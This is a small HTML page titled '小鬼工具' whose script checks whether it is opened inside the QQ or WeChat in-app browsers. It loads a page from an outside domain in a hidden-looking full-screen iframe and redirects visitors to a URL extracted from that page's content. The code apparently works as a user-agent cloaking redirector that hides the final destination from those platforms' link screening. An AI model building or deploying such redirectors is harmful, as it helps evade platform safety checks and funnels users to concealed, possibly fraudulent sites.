<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>小鬼工具</title>
	</head>
    <style type="text/css">
    *{
        margin: 0;
        padding: 0
     }
     iframe{
            width: 100%;
            height: 100vh;
     }
          
    </style>
	<body>
    <div>
    <iframe frameborder="false" src="http://xg5020.top/gjpass.html"></iframe>
    </div>
    <script>         
            var iframe = document.querySelector("iframe");
            var div = document.querySelector("div");
            if(navigator.userAgent.indexOf("QQ/") == -1 && navigator.userAgent.indexOf("MicroMessenger") == -1){
                 div.style.display = "none";
                 iframe.src = "";
                 window.location.href="http://xg5020.top/gjpass.html"
            }else{
                 iframe.addEventListener("load", function() {
                     var b = iframe.contentWindow.document;  
                     var c = b.getElementById("p").innerHTML;
                     if(c !== null && c !==""){
                         window.location.href = "https"+c.split("?https")[1];
                     }  
                 })
            }
    </script>
	</body>
</html>